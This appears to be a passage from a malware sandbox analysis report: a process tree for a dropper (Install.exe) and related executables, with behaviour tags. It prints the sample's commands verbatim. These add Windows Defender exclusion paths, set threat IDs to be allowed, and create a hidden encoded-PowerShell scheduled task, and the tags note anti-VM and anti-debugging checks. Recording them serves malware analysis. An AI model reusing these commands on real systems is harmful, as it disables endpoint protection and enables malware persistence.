  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATiuMetuMWHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATiuMetuMWHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IchmcMfQaXUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IchmcMfQaXUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UyPATDbiwjgOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UyPATDbiwjgOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VcCVDDBRU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VcCVDDBRU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bgwuTdWixDdNC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bgwuTdWixDdNC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kwkuzFKVqEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kwkuzFKVqEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\namDtuGKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\namDtuGKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wEnnazEvJNiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wEnnazEvJNiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BRUhuLZnBvQZvqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BRUhuLZnBvQZvqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NonltQQlyMoZtVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NonltQQlyMoZtVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ruCXiJvmKkuTmmIt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ruCXiJvmKkuTmmIt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:848
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4764
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BRUhuLZnBvQZvqVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BRUhuLZnBvQZvqVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NonltQQlyMoZtVVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NonltQQlyMoZtVVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ruCXiJvmKkuTmmIt /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ruCXiJvmKkuTmmIt /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\sFyaDrJXZzAeWCdu /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\sFyaDrJXZzAeWCdu /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5196
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gemxrtZMH" /SC once /ST 06:06:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6524
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gemxrtZMH"
  2⤵
  PID:5920

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7056

C:\Users\Admin\AppData\Local\Temp\7zS836A.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS836A.tmp\Install.exe 2Z /tNLdideeX 385137 /S
1⤵
- Executes dropped EXE
PID:212
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Modifies data under HKEY_USERS
  PID:5700
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6520
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4524
